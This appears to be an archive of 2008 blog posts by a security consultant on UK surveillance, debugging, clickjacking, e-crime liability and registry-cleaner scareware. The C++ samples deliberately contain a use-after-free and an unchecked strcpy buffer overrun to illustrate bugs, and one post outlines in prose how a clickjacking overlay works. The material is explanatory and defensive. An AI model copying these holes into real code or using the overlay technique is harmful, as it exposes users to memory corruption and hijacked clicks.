Hmmm… what websites were visited? That could be a useful one. In the course of writing this post, I have been to over 100 sites and I made no attempt at all to hide where I went. I don’t mind anyone knowing that I was looking at news sources and RFCs. Had I minded, I would have used a proxy. There are over 2000 free web proxies, hardly any of which are in the UK. You could investigate everyone who uses a proxy, of course. He who would keep a secret must keep it secret that he has a secret to keep, if I may quote Carlyle. You would be looking at trillions of web addresses each year though. It would be difficult data to mine. Where would you capture the data? The DNS servers would seem to be an obvious choice but I don’t need to go via a DNS server at all – indeed, the local cache serves most of my needs and I can keep a hosts file as large as I need. I don’t have to use a UK based DNS service at all and unless data is harvested at every router along the way, I don’t see how the traffic could be recorded as it doesn’t go through a central point. Again, you can monitor those who let you but those that want to slip through the net will find it easy enough to do so.

What about other forms of communication? Instant messaging would be hard to monitor – text messages for most systems go via the server, but voice and data go from peer to peer via UDP. Monitoring that would need something very like the Bundestrojaner, a bit of software created by the Austrian government to monitor individual computers using malware-type techniques, and that would be politically difficult to implement widely. Audio and video data is harder still to capture, and when you look at structures like the Skype cloud architecture, where there is little centralised control, it is tempting to throw up your hands in horror.

Of course, the more data you collect, the less effective your screening is. You really want to monitor the smart and criminal ones – and you have data on the dumb and the honest. You have so much data that it could only be analysed by machine, even if you have an army of spooks. The more data you have, the lower the signal to noise ratio and the less intelligent scrutiny you can give to the signal.

The problem is actually still worse. Let us consider what data related to terrorism might look like. Would it be a message saying “On Tuesday, we will meet at the town hall at 7:30. You bring the Semtex and I will bring the guns. If wet, meet in the King’s Head”? Why would it be in English? Why would it be in plain text? I could send that information as an MP3 of speech, as a JPG, as a video, as an encrypted file or hidden in a dozen ways, many of which are well known and have been used in dozens of films. We can safely assume that any terrorist worth his salt can do 20 minutes’ research. Code books are old hat but they still work. No scanning program can work out whether a discussion of the health of an aged relative really means something different when decrypted the old-fashioned way with a look-up reference such as the old book ciphers. There are also some cool things that you can do with steganography.

So, what does this cost us if it is implemented? Well, maybe not much. If the data is mostly ignored then there is little loss of liberty and the intelligence services will not be wasting much of their time. It might be useful in a case where our friends in the Office for Security and Counter Terrorism were trying to work out who a suicide bomber had been talking to.

However, if it is misused, it will have a massive effect on civil liberties and will blind the intelligence services because there will be too much data to ever process.

There is also a problem that you always have to consider. Even if you trust this government (and I am making no statement at all on that), do you trust every government that will come after? Will none of them use this to oppress their opponents or police the ranks of their own party? Will no future government use this to control its population? Forever is a very long time. There will be a bad leader some day. I leave it to you to decide how happy you are with that thought.

Signing off

Mark Long, Digital Looking Glass

Tuesday 14 October 2008

Debugging war stories

Fishermen tell of the one that got away. Golfers tell of the amazing shot that happened when there was no-one to see. People who like debugging (and we are an odd breed) tell of the worst bug that they ever faced.

Well, there have been some really obscure ones. There was one that I tried to find every working day for 4 months, in an operating system where the problem took 40 minutes to create, couldn’t be automated, there was no debugger and the crash killed the OS stone dead with no diagnostics. That was one to remember, but with modern tools you don’t get that sort of thing any more. Modern nightmares are a bit different and I would like to talk about some of the ones that I sometimes see. Oh, most of these will be in C++ because it makes more sense that way. They also happen in the runtime systems of various languages, most of which are written in C or C++.

References to COM objects fail apparently randomly with a null pointer or a pointer that leads to garbage, but there doesn’t seem to be any error in the code. Ah, how often have we seen this one? A variant is that a DLL has disappeared between function calls into it. The explanation is simple – the reference count is wrong, so the object (or DLL, or whatever it was) got unloaded. You can’t see what unloaded it because it happened on another thread, or the system cleaned it up under you without you doing anything because it looked unused. That is always fun, because there can be dozens of places in the code where you see the access violation and you don’t know if you are looking at one bug or a dozen. It is relatively easy to track these down with a little judicious breakpointing and stepping, just so long as you remember that you are altering the behaviour as soon as you add a debugger. If it doesn’t reproduce when there is debugging or tracing, oh, that can be a horror.
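
Purely as an illustration of the shape of that bug – this is a toy reference-counted class, not real COM – here is the classic mistake: a second pointer to the object is stashed away without a matching AddRef, so the object goes away while someone still holds a pointer to it.

    #include <iostream>

    // A toy reference-counted object standing in for a COM object. Not real COM.
    struct Widget
    {
        long refs = 1;
        int  value = 42;
        void AddRef()  { ++refs; }
        void Release() { if (--refs == 0) { std::cout << "Widget destroyed\n"; delete this; } }
    };

    int main()
    {
        Widget* original = new Widget();    // reference count is 1

        // The bug: a second pointer is stashed away but nobody calls AddRef().
        Widget* cached = original;

        original->Release();                // count hits 0 and the object is gone

        // Much later, possibly on another thread, possibly in another module,
        // 'cached' points at freed memory. Sometimes it still "works", sometimes
        // you get garbage, sometimes an access violation - apparently at random.
        std::cout << cached->value << "\n"; // undefined behaviour
        return 0;
    }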

Data being wildly wrong for no obvious reason, more or less at random – for example, a currency value that was fine when it went into the record comes back as a NaN (a bit pattern that can’t be a number) when you come to use it. Old hands will recognise that one as probable heap corruption. There are great tools to help you with that one. If you are a fan of WinDbg, have a look at the GFlags tool, which can turn on the page heap. In managed code, you can get similar things if you pass a data structure of some kind to an unmanaged DLL and don’t pin it in memory. As with the previous example, the cause of the crash is nowhere near where the actual error is. These are nasty types of error for most people, but there are techniques for dealing with them.
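
A minimal sketch of that class of bug, with invented field names: a write runs off the end of a buffer and tramples a neighbouring value, and the damage only shows up later, far from the line that caused it. (The page heap that GFlags can switch on catches real heap overruns by placing a guard page straight after each allocation.)

    #include <cstring>
    #include <iostream>

    // Illustrative only: a record with a small name buffer next to a currency value.
    struct Record
    {
        char   name[8];
        double balance;
    };

    int main()
    {
        Record r;
        r.balance = 123.45;                 // fine when it goes in

        // The bug: no length check. A 15-character name (16 bytes with the
        // terminator) overruns the 8-byte buffer and tramples 'balance'. In real
        // code the overrun is often into the next heap allocation, so the victim
        // is some completely unrelated object.
        std::strcpy(r.name, "Much too long!!");

        // Much later, a long way from the strcpy, the value is garbage.
        std::cout << r.balance << "\n";     // no longer 123.45
        return 0;
    }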

Memory leaks used to be very popular – and very often misdiagnosed. People are sometimes a bit confused by memory usage. As regular readers of my old blog know, I am a big fan of object brokers. If you haven’t come across them before, they are memory allocators that you write yourself that will give you an object to use when you need it, and you return it when you are done. From the point of view of the client code, what you have looks a lot like the heap – I ask for a blank MyObj structure by calling a function and I get a pointer. When I am done, I return it with a different function. The functions are not called new and release, but so what? The difference is that the object broker isn’t creating and destroying the objects – it is maintaining a pool of them, and they are not taken from and returned to the heap every time. I always like to have my object broker tell me how many objects it currently has on loan. That makes debugging memory issues much simpler. Oh, and some people will tell you that there is no need for object brokers now that there is the low fragmentation heap. Well, I will hang on to mine. Why have the system do work that it doesn’t need to do? However…
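
For anyone who hasn’t met the idea, here is a bare-bones sketch of an object broker – the names are invented and all error handling is left out. The detail to notice is the on-loan counter: when someone claims the process is leaking, the broker can say exactly how many objects are still out.

    #include <iostream>
    #include <vector>

    // The kind of object being brokered - the contents don't matter for the sketch.
    struct MyObj
    {
        char buffer[256];
    };

    // A bare-bones object broker: hands out objects from a pool instead of going
    // to the heap for every request, and keeps count of what is on loan.
    class ObjectBroker
    {
    public:
        MyObj* Borrow()
        {
            ++onLoan_;
            if (pool_.empty())
                return new MyObj();             // pool empty - grow it
            MyObj* obj = pool_.back();
            pool_.pop_back();
            return obj;
        }

        void Return(MyObj* obj)
        {
            --onLoan_;
            pool_.push_back(obj);               // back into the pool, not the heap
        }

        long OnLoan() const { return onLoan_; } // invaluable when chasing "leaks"

        ~ObjectBroker()
        {
            for (MyObj* obj : pool_) delete obj;
        }

    private:
        std::vector<MyObj*> pool_;
        long onLoan_ = 0;
    };

    int main()
    {
        ObjectBroker broker;
        MyObj* a = broker.Borrow();
        MyObj* b = broker.Borrow();
        std::cout << "On loan: " << broker.OnLoan() << "\n"; // 2
        broker.Return(a);
        broker.Return(b);
        std::cout << "On loan: " << broker.OnLoan() << "\n"; // 0 - no leak here
        return 0;
    }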

Object brokers often cause reports of memory leakage. A common concern was that more memory was being held after an operation than before it. A lot of people raised this issue in the early days of managed code. What you commonly see with code that uses one or more brokers is that the memory usage will grow and then reach a stable plateau, with a little variance caused by allocations that are not brokered – and there will always be some of those. It is always worth waiting to see if a rise in memory levels off after a while before deciding that you have a leak. However, you can get a situation with managed code where the garbage collector is overwhelmed: under very heavy load, the memory grows until the GC is forced to collect because allocations would otherwise be impossible. This is a pretty major housekeeping job and it requires access to a good deal of memory to keep track of what is going on – and there isn’t much memory around because the process space is full of objects waiting for GC. Things get messy then.
Multithreaded hangs are always tricky and I have spoken at length about them before in my old blog. Nothing much has changed about how you debug those. It is still like trying to untangle a mad woman’s knitting in the dark while wearing gloves. This is certainly one case where prevention is much better than cure.

Of course, there are also logic bugs but each one of those is subtly different and it is hard to come up with a common approach more detailed than “Step through it and see what it really does”.

When I was a dev, I was told that I spent too much time debugging code but I have to say that the experience has stood me in excellent stead.

Signing off

Mark Long, Digital Looking Glass Ltd

Thursday 9 October 2008

ClickJacking, the new kid in town

There is a lot of buzz about this at the moment. I thought that there would be after it was requested that it not be mentioned in the OWASP meetings. So, what is it?

Well, to start with, let us say what it isn’t because that is important.

It is not:



1. A single exploit. It is a class of exploit rather than a specific example.

2. It is not really a remote code execution sort of vulnerability, so it doesn’t allow an attacker to take complete control of your system. It is more like a cross-site scripting attack against the browser, if such a thing were possible.

3. It is not a code defect in any particular browser and it is not a bug in Macromedia Flash. The first proof of concept just used Flash.

4. It is not browser or OS specific.


What it is:


1. A browser based exploit. If you are not viewing HTML, it can’t have an effect.

2. A way of getting a mouse click on a web page to mean something other than what the user means it to mean.*

3. A way of getting the browser to do what it could already do had the user asked for it.

So, the exploit hijacks a click, hence the name ClickJack. But why did I put a * by the side of that entry? Well, that is because the name is a little misleading. No-one else seems to have mentioned that you should be able to hijack keystrokes that have the same effect as mouse clicks. I am willing to bet that you have accidentally hit on this functionality a dozen times. In a text box that doesn’t accept multi-line input, hitting the Enter key will normally submit the form – I have cursed a hundred times when a logon was submitted without the password because I typed Enter when I meant Tab. Backspace takes you back one page. Tab and Shift-Tab change the focus, and that can fire an onFocus event. Accordingly, I don’t see that this is limited to mouse clicks.

What could be done with this class of exploit?



Well, the proof of concept was rather clever. It fooled the user into turning on their microphone and web camera. There has been malware before that did this and then relayed the images, and it was much loved by paedophiles. However, this was just a proof of concept and didn’t do anything malicious.

Essentially, a malicious page could persuade the user (through social engineering) to take an action, such as clicking a button, that could be converted into a click somewhere else on the page. In the case of the proof of concept, it was the dialog provided by Flash to enable or disable the webcam and microphone features. However, it could be used to submit a form or open a new link – basically, whatever you could trigger with a click. It hijacks the click for its own purpose.

So, what does this add to the mix? Well, not as much as you might think. Pages that advertise scareware tend to be one big bitmap, including the “close” button, and any action takes you to the next stage in the process of installing the “potentially unwanted software”. Essentially, when you are viewing a malicious page, any interaction with it is likely to do things that you didn’t want. So, clickjacking is just another way that this can be done.

How does it work in practice?



That hasn’t been made public but it is fairly obvious how you could do it. If you put the object that you want clicked under a graphic that the user will click on and then make the graphic invisible for part of the time, the graphic will seem to flicker – and repeated mouse clicks will sometimes hit the graphic and will sometimes hit what is underneath it. That sometimes happens in regular form based programs when controls are hidden and shown to customise the form. The required DHTML is trivial. Maybe you could have a simple game where the user has to click repeatedly on a butterfly as it flits around the screen. That would do the job nicely. The best use for this would probably be to hack a bank site or a stock trading site to add a malicious iFrame that covered the real content of the page. Of course, if you can do that, you have probably already won.

Mitigation



Well, the old rule applies. Do not interact with sites that are malicious. Of course, the malicious functionality could be in a banner ad or something like that and accordingly, clicking on banner ads may be unwise. I never do it anyhow which must come as a disappointment to those that pay for these things.

Running the browser with fewer rights is always a good idea. On Vista, Server 2003 and Server 2008, this is the default state. On Linux, you can spawn the browser with lower rights manually. This doesn’t mean that you won’t get exploited. It just means that the exploit will be able to do less.

Disabling DHTML in emails (again, the default after Server 2003) is also helpful.

Fixing the problem



Now, that is a tricky one. A lot of people want this fixed but it isn’t a security flaw in the classic sense. There is no buffer overrun. The browser is doing what it was asked to do. If you fool people into clicking the wrong thing then that isn’t really anything that the browser can fix. I think that you would need to disable at least the following things:

* Making controls visible or invisible under script control or in response to events

* Allowing controls to move under script control or in response to events

* Allowing irregular shapes

Doing that would break a lot of critical sites.

Hope that this information was of use to you.

Signing off,

Mark Long, Digital Looking Glass Ltd.

Tuesday 7 October 2008

Who is liable for computer crime? Us, apparently.

I have, in the past, had the good fortune of helping the police with their enquiries. I don’t mean that in the euphemistic sense of “arrested but not yet charged” but in terms of answering technical questions such as “Does this record in this structure mean that the document was once edited on a Macintosh computer?” As computers have become more and more integrated into our society, so they have become part and parcel of police work. Of course, some bits of detective work are harder than others. I read with interest that a car thief, specifically a Mr Aarron Evans, had been successfully prosecuted in Bristol after a camera-equipped car caught a clear and readable image of his neck. Mr Evans had been kind enough to have his name and date of birth tattooed onto his neck, making the investigation a lot easier.

Sadly, most cases are not that easy. The House of Lords Science and Technology Committee will be asking the government to do more against online crime. Some of the proposals from the committee will be a challenge to the industry including holding software developers liable for security flaws in their software. I can see that one getting very expensive very quickly and possibly killing off some shareware providers. A smallish company would struggle under a hefty fine, especially in these difficult days. However, I am talking about policing here and it would be tricky for the police (because where else would crimes be handled) to assess how serious a software flaw was. That recommendation has not (yet) been passed into law but it opens up a whole can of worms for the software industry and the police alike. Imagine a website being hacked to host a malicious download – an everyday thing, really. Is the web developer liable for the damage done to those that downloaded the component? That would seem to be the literal reading.

Ahead of Friday’s session, Lord Broers, chairman of the committee said:

“In our initial report we raised concerns that public confidence in the internet could be undermined if more was not done to prevent and prosecute e-crime. We felt that the Government, the police and the software developers were failing to meet their responsibilities and were quite unreasonably leaving individual users to fend for themselves.

Some of our recommendations, such as the establishment of a specialist e-crime police unit, are now being acted on by Government. But others, such as software developers' liability for damage caused by security flaws and enabling people to report online fraud directly to the police rather than their bank, have either been ignored or are awaiting action.”

The bolding was mine.

Apparently there is going to be a replacement for the e-crimes police force that was disbanded in 2007. In a world where the required skills are rarer than hen’s teeth, there are going to be a lot of people scrabbling around to get things looked at and, where needed, fixed.

The discussion of the committee’s report is at 12 PM (GMT+1) on October 10th – the URL for the live webcast is http://www.parliamentlive.tv/

Interesting times, gentle reader

Signing off,

Mark Long, Digital Looking Glass Ltd

Wednesday 1 October 2008

Scareware? No thanks

Sometimes it feels like I am a lone singer in the darkness. It is always nice to know that I am really singing with the choir. I have been rattling on for quite a while about social engineering and greyware – that is to say software that is essentially useless and misleads the user into installing it. Some people use the phrase “potentially unwanted software” instead which is thought to be less legally actionable but I will never learn and will continue to say what I think.

Anyway, according to the dear old BBC, my former employer and Washington state are taking joint legal action against both Branch Software and Alpha Red, two companies owned by the extravagantly named James Reed McCreary IV. The most problematic of these “potentially unwanted softwares” was one called Registry Cleaner XP, which is not the old programmer’s tool popular back in the late 90s but a rather different application that seems to be sold from this website – please don’t install it unless you think that my opinion and that of my former colleagues is a nonsense. I do not recommend this software. The state of Washington suggests that the fine should be $2000 for each false warning made by this software. Since it is not unusual for this software to pop up over 200 warnings over the course of 24 hours, and we are talking of thousands of systems, the fine could mount up rather quickly indeed.

Let us think for a moment though. What could a registry cleaner actually do? Well, we need to consider what the registry is – this is the XP version. If you are interested in what is different in Vista and Server 2008, please let me know. By the way, no trade secrets here. All of this information has been revealed in one form or another over the years.

The registry is a database of entries on a huge range of different things. Let us look at the sections.

HKEY_CLASSES_ROOT relates to COM objects and who would have thought that there were so many of them? File associations, Class IDs, interface IDs for COM components that can be remotely instantiated and such like are stored here. So, how could you have duff entries in here? For developers, it is pretty simple – developing new COM components all the time meant that there were a lot of dead entries in here unless the developer took good care to clean up the box. Visual Basic 6 was a bit of a devil for bloating this section of the registry. It allowed you to extend a COM interface which technically speaking you really shouldn’t be able to do and it fudged the mechanics by using interface forwarding which was completely undocumented last time that I looked. There were two results of this. The first was that you could change the interface of a COM component and the clients that expected the old interface would still work on that machine but probably not on a client system which is not actually that much use for a developer tool. The second was that you ended up with a great many registry entries pointing at other registry entries. The sensible thing to do was to break compatibility, get new GUIDs and compile the client and the server into a clean version but that left a lot of dead entries. There was a little utility written by a support tech that went through the class IDs and interface IDs and deleted the ones that didn’t point to a valid file. This stopped being useful with hosted components where the reference was not to a simple DLL or EXE but instructions to MTX.EXE or these days SVCHOST to instantiate the component. Running this tool would probably break a modern operating system pretty badly but it was the bee’s knees in 1998. So, that was the only registry cleaner that ever had a good excuse for existence in my opinion. Could you get dead entries on a normal end user XP box? Well, if they deleted an application that was a COM server or had a file association without uninstalling it, then yes, it would happen but to be honest, a handful of redundant references would have little effect on performance. The only time that I see broken references like this on a consumer system is where malicious browser helper objects have been whacked out by an antivirus product and it has been sloppy about the cleanup. So, no need for cleaning in this bit of the registry.
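
Purely as an illustration of the sort of thing that old support utility did – and, in keeping with the warning above, this sketch only reports and deletes nothing – here is roughly how you would walk HKEY_CLASSES_ROOT\CLSID and flag InprocServer32 entries whose file no longer exists. It knows nothing about hosted or surrogate components, or about expandable or quoted paths, which is exactly why the approach stopped being useful.

    #include <windows.h>
    #include <iostream>
    #include <string>

    // Rough, report-only sketch: list CLSIDs whose InprocServer32 points at a file
    // that no longer exists. It does not understand surrogate-hosted components,
    // REG_EXPAND_SZ paths or quoted paths, so do not act on its output blindly.
    int main()
    {
        HKEY clsidRoot;
        if (RegOpenKeyExA(HKEY_CLASSES_ROOT, "CLSID", 0, KEY_READ, &clsidRoot) != ERROR_SUCCESS)
            return 1;

        for (DWORD index = 0; ; ++index)
        {
            char clsid[256];
            DWORD clsidLen = sizeof(clsid);
            if (RegEnumKeyExA(clsidRoot, index, clsid, &clsidLen,
                              nullptr, nullptr, nullptr, nullptr) != ERROR_SUCCESS)
                break;                                    // no more subkeys

            std::string serverKey = std::string(clsid) + "\\InprocServer32";
            HKEY server;
            if (RegOpenKeyExA(clsidRoot, serverKey.c_str(), 0, KEY_READ, &server) != ERROR_SUCCESS)
                continue;                                 // not an in-process server

            char path[MAX_PATH] = {};
            DWORD pathLen = sizeof(path);
            DWORD type = 0;
            if (RegQueryValueExA(server, nullptr, nullptr, &type,
                                 reinterpret_cast<LPBYTE>(path), &pathLen) == ERROR_SUCCESS &&
                type == REG_SZ &&
                GetFileAttributesA(path) == INVALID_FILE_ATTRIBUTES)
            {
                std::cout << clsid << " -> missing file: " << path << "\n";
            }
            RegCloseKey(server);
        }
        RegCloseKey(clsidRoot);
        return 0;
    }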

HKEY_CURRENT_USER is a phantasm. It just points to a specific user in HKEY_USERS. RegEdit is a habitual liar. Just because you can see it is no reason to think it exists and just because you can’t doesn’t mean that it doesn’t exist. So, no need for a registry cleaner there.

HKEY_LOCAL_MACHINE is the home of some interesting things. All the driver settings live here and the settings for a great many third party components and Windows settings. You could have dead entries in here if software was deleted without removing its settings but that wouldn’t have a great deal of effect on performance as there is not a linear search algorithm for these things. Dead entries just use a bit of space. It would be pretty dangerous to clean up entries without knowing what they represented and there wouldn’t be much point. Removing driver settings, security settings and so on would break things badly. No call for a registry cleaner there then. It isn’t that dirty.

HKEY_USERS has a branch for each user account and if you look there, you will see some well known SIDs (security IDs) and some less well known ones that probably represent real users. There will be user specific software settings. Actually, a lot of these settings will never be used for anything. I have a guest account on the system where I am writing this. It is disabled which is the best thing to do with a guest account. If I don’t know you well enough to give you an account of your own, you have no business running code on this box. Looking at the guest account, it has settings for the AV product installed, my Creative Zen, iTunes and all sorts of things that get installed for all users by default. Switching quickly to the admin account gives a last login date for the GUEST account of never. No-one has ever used those settings and they never will. My ASP.NET account doesn’t use those settings either. It exists solely to run ASP.NET code in a very limited environment. Now, something could usefully clean up some of those entries but no tool that I know does that. Oh well, it is just some memory bloat. The one place where it would be of some use, no registry cleaner reaches. Oh well.

HKEY_CURRENT_CONFIG is just another phantom, pointing at the current hardware profile settings under HKEY_LOCAL_MACHINE.

If you want to keep your system nice and spry, here is my advice:
1. Add memory. It is cheap these days, and if you are hard up against your address space limits then it is probably time to be running 64 bit.
2. Do not load things that you do not need. Autoruns, from Sysinternals as was, is a fine tool for seeing how much junk loads each time that you start up. It is amazing what you can remove without ever missing it.
3. Defrag your hard drive once in a while.
4. Stay malware free.

That is what I do and this machine is used every day and still runs pretty darn sweet. The OS was installed in 2004. Remember when the OS had to be reinstalled every few months? No need for that and, in my opinion, no need for registry cleaner tools.

Signing off,

Mark Long, Digital Looking Glass Ltd